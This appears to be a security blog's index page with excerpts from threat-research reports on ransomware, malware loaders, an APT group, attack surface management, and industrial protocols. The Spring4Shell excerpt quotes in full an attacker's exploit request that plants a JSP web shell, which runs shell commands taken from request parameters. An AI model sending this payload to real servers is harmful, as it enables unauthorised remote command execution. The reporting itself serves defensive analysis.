reports

ICS Security Event S4 2022 Review

Posted on by Admin
ICS Security Event S4 2022 Review

Technology and International Relation Niloofar Razi Howe one of the unique and strong influencers in the cybersecurity world, investor of technology ventures, directors of consulting firms, and advisors to public agencies such as the Department of Defense delivered the keynote speech for the event. Howe spoke about how technologies are affecting real-world international relations, saying that decentralized, distributed and personalized capabilities blur the line between cybercrime and national attacks. She added that the modern war…

Read More

Cloud-Native App Security Platform

Posted on by Admin
Cloud-Native App Security Platform

The cloud is driving transformative benefits for global organizations. But in rushing their applications and infrastructure into new computing environments, they’re also exposing business-critical data to new risks. There are now more ways for the bad guys to steal data, deploy malware, hijack resources, and hold them to ransom. The complexity of hybrid and multi-cloud environments and the need to coordinate across multiple stakeholder groups further compound these challenges. The answer is a simple, flexible,…

Read More

Examining the Black Basta Ransomware’s Infection Routine

Posted on by Admin
Examining the Black Basta Ransomware’s Infection Routine

Examining the Black Basta Ransomware’s Infection Routine Ransomware We analyze the Black Basta ransomware and examine the malicious actor’s familiar infection tactics. By: Ieriz Nicolle Gonzalez, Ivan Nicole Chavez, Katherine Casona, Nathaniel Morales May 09, 2022 Read time:  ( words) Black Basta, a new ransomware gang, has swiftly risen to prominence in recent weeks after it caused massive breaches to organizations in a short span of time. On April 20, 2022, a user named Black…

Read More

NetDooka Framework Distributed via PrivateLoader Malware as Part of Pay-Per-Install Service

Posted on by Admin
NetDooka Framework Distributed via PrivateLoader Malware as Part of Pay-Per-Install Service

NetDooka Framework Distributed via PrivateLoader Malware as Part of Pay-Per-Install Service Malware This report focuses on the components and infection chain ⁠of the NetDooka framework. Its scope ranges from the release of the first payload up until the release of the final RAT that is protected by a kernel driver. By: Aliakbar Zahravi, Leandro Froes May 05, 2022 Read time:  ( words) We recently encountered a fairly sophisticated malware framework that we named NetDooka after…

Read More

AvosLocker Ransomware Variant Abuses Driver File to Disable Anti-Virus, Scans for Log4shell

Posted on by Admin
AvosLocker Ransomware Variant Abuses Driver File to Disable Anti-Virus, Scans for Log4shell

Conclusion While AvosLocker has been documented for its abuse of AnyDesk for lateral movement as its preferred application, we note that other remote access applications can also be abused to replace it. We think the same can be said for the software deployment tool, wherein the malicious actors can subsequently decide to replace and abuse it with other commercially available ones. In addition, aside from its availability, the decision to choose the specific rootkit driver…

Read More

New APT Group Earth Berberoka Targets Gambling Websites With Old and New Malware

Posted on by Admin
New APT Group Earth Berberoka Targets Gambling Websites With Old and New Malware

We dubbed these downloaders PuppetDownloaders since they are connected to the PuppetLoader malware family, as evidenced by our observations: This malware and PuppetLoader both use the same string decryption routine that uses the same key. This malware and PuppetLoader both use the same XOR key (2726c6aea9970bb95211304705b5f595) that is used to decrypt the embedded Loader.dll file. This malware and PuppetLoader’s decrypted Loader.dlls share similar strings such as “[-] UnExist pwszModuleFunName:”. This suggests that a common framework…

Read More

Here’s a Path to Better Attack Surface Risk Management

Posted on by Admin
Here’s a Path to Better Attack Surface Risk Management

So, how can security leaders stay on top of their attack surface and ahead of the bad guys? By leveraging a unified cybersecurity platform that enables continuous security visibility and monitoring across the discovery, assessment, and mitigation phases of the attack surface risk lifecycle. Let’s dive deeper into how a platform can enhance attack surface risk management versus utilizing point products. Discover your digital attack surface First, you need total visibility to be able to…

Read More

Attack Surface Management Partner Bit Discovery Bolsters Offering

Posted on by Admin
Attack Surface Management Partner Bit Discovery Bolsters Offering

Security starts with visibility: you can’t protect what you can’t see. And yet, this is a perennial problem in cybersecurity. We’re excited to bring attack surface discovery capabilities to the Trend Micro One platform, providing ongoing visibility to internal assets (devices, identities, applications) but also external, Internet-facing assets. And we’re doing the latter in partnership with Bit Discovery, an innovative start-up founded by Jeremiah Grossman (previously co-founder of WhiteHat Security). How bad is the attack…

Read More

Spring4Shell Vulnerability CVE-2022-22965 Exploited to Deploy Cryptocurrency Miners

Posted on by Admin
Spring4Shell Vulnerability CVE-2022-22965 Exploited to Deploy Cryptocurrency Miners

Among the exploitation attempts were ones aimed at deploying cryptocurrency miners. In this section, we look at how the malicious actors behind these exploitation attempts create a web shell to deploy their cryptocurrency miners. The following code is used to create the web shell: GET /?class.module.classLoader.resources.context.parent.pipeline.first.prefix=zbc0fb&class.module.classLoader.resources.context.parent.pipeline.first.fileDateFormat=&class.module.classLoader.resources.context.parent.pipeline.first.directory=webapps%2FROOT&class.module.classLoader.resources.context.parent.pipeline.first.suffix=.jsp&class.module.classLoader.resources.context.parent.pipeline.first.pattern=%25%7Bx%7Di+try+%7BRuntime.getRuntime%28%29.exec%28System.getProperty%28%22os.name%22%29.contains%28%22ndo%22%29+%3F+new+String%5B%5D%7B%22cmd.exe%22%2C+%22%2Fc%22%2C+request.getParameter%28%22w%22%29%7D+%3A+new+String%5B%5D%7B%22%2Fbin%2Fsh%22%2C+%22-c%22%2C+request.getParameter%28%22l%22%29%7D%29%3B%7D+catch+%28Exception+e%29+%7B%7D%3Bout.print%28%22%40pong%22%29%3B+%25%7Bz%7Di HTTP/1.1 Host: <redacted>:<redacted> User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:83.0) Gecko/20100101 Firefox/83.0 Accept: */* Accept-Language: en-US,en;q=0.5 X: <% Y: Runtime Z: %>// Accept-Encoding: gzip   The web shell’s…

Read More

Critically Underrated: Studying the Data Distribution Service (DDS) Protocol

Posted on by Admin
Critically Underrated: Studying the Data Distribution Service (DDS) Protocol

By Federico Maggi, Rainer Vosseler (Trend Micro Research), Mars Cheng, Patrick Kuo, Chizuru Toyama, Ta-Lun Yen (TXOne Networks), Erik Boasson (ADLINK), and Victor Mayoral Vilches (Alias Robotics) Despite being unknown even to industry practitioners, the Data Distribution Service (DDS) protocol has been in use for more than a decade. This middleware software technology is responsible for running billions of public and private devices and mechanisms currently in use.  DDS is integral in embedded systems that…

Read More
1 15 16 17 18 19 27